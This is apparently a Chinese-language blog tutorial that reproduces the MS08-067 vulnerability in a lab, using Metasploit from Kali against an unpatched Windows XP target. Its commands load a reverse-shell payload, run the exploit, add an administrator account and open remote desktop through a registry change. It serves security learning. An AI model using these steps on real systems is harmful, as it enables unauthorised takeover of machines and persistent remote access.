漏洞利用实战(一) winxp的ms08_067漏洞利用复现

我竟然把这个坑填下去了,可喜可贺。

1  ms08_067

      ms08_067是微软win操作系统中存在的一个服务器服务漏洞,在win server2008之前的系统都会受这个漏洞影响,黑客可以利用这个漏洞控制目标系统。

2  操作概述

      使用kali linux攻击机对win xp系统利用此漏洞进行攻击,在靶机上建立管理员账号并远程控制靶机。

3  实验环境

    kali linux攻击机(上一篇博客提到过)

    win xp sp3 english(纯净版,不带任何补丁)

4  控制靶机

    进入kali终端,输入以下命令运行msf:

msfconsole

寻找并使用模块

    我们要找的是ms08_067漏洞,所以我们首先寻找此漏洞

search ms08_067_netapi

    我们找到漏洞后,使用此漏洞

use exploit/windows/smb/ms08_067_netapi

加载攻击载体

    攻击载体有很多,我们这次使用shell_reverse_tcp

set payload generic/shell_reverse_tcp 

设置ip

    LHOST为攻击机ip,RHOST为靶机ip,例如:

set LHOST 192.168.1.62

寻找对应版本target

    target需要与靶机系统版本对应,在不确定版本时设置target为0也可自动选择

set target 0

运行

exploit

    到此,我们就进入了靶机系统,你的kali Terminal应该显示以下信息。

 

5  远程桌面连接

    接下来,我们尝试在靶机上创建账户并使用远程桌面连接靶机,

    首先,我们创建一个账户。

user net host-name password /add

    提升为管理员权限

net localgroup administrators host-name /add

    winxp远程操控端口为3389,我们将这个端口打开

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

    使用netstat查看端口

netstat -an

    这时,我们会发现3389端口处于开启状态。

    然后,我们可以用局域网内的计算机远程桌面连接到靶机,win10运行——>MSTSC。

    以上就是ms08_067漏洞利用复现的全过程。

6  问题记录

访问445端口被拒绝

    装了445端口补丁的winxp将445端口停用,所以复现此例程时不要使用带补丁的win xp。

    还有可能是因为靶机打开了防火墙,复现时需要将防火墙关闭。

设置target

    如果不设置target,将不会判断靶机的系统版本进行攻击。建议将target设置为0,target为0时会自动判断靶机系统版本攻击。

7  小结

    winxp上的漏洞其实还有很多,感兴趣的同学可以查一下其他的漏洞并尝试复现,折腾永不停止!

 

  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值